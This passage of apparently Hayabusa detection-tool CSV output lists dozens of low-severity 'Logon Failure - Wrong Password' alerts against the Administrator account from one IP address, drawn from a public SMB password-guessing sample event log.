NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
